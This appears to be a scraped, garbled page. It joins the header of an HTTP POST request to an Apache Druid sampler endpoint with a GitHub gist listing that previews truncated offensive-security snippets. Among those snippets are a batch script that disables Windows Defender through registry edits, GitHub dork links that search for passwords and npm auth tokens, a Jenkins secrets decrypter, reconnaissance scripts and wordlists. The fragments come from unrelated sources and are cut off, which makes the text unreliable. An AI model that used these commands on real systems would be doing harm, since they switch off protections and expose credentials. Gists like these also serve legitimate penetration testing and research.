POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
jhaddix
/ all.txt
Created
January 19, 2019 04:35
— forked from orangetw/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
jhaddix
/ Github bash generated search links (from hunter.sh)
Created
January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
Parasimpaticki
/ gist:0b1f1f508b2ee2a146244ab53d0bb3b8
Created
May 6, 2020 23:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Escape slash from name for folder name | |
| folderName=$(echo $1| awk '{gsub("/","_")}1'); | |
| mkdir $folderName && cd $folderName | |
| fqdn=$1; | |
| ipList=$(dig +short $fqdn|grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'); #Get all A names | |
| if [ -z "$ipList" ] | |
| then | |
| ipArgument=$fqdn |
TheBinitGhimire
/ README.md
Last active
October 27, 2024 19:26
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!
Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk
I have included my script in another file (main.sh), which I used in discovering this vulnerability.
I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.
I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.
MHaggis
/ disablethings.bat
Created
March 2, 2021 17:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
defparam
/ cluster.py
Last active
October 3, 2025 20:00
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering | |
| # Author: Evan Custodio (@defparam) | |
| # | |
| # MIT License | |
| # Copyright 2021 Evan Custodio | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # |
djhohnstein
/ JenkinsDecrypter.py
Last active
October 22, 2022 23:23
Decrypt jenkins secrets with all key material from disk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import re | |
| import sys | |
| import base64 | |
| from hashlib import sha256 | |
| from binascii import hexlify, unhexlify | |
| from Crypto.Cipher import AES | |
| from xml.dom import minidom | |
| from pprint import pprint |
jhaddix
/ reconftw.cfg
Last active
September 24, 2025 23:27
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################# | |
| # reconFTW config file # | |
| ################################################################# | |
| # General values | |
| tools=~/Tools # Path installed tools | |
| SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path | |
| profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile | |
| reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version | |
| generate_resolvers=false # Generate custom resolvers with dnsvalidator |
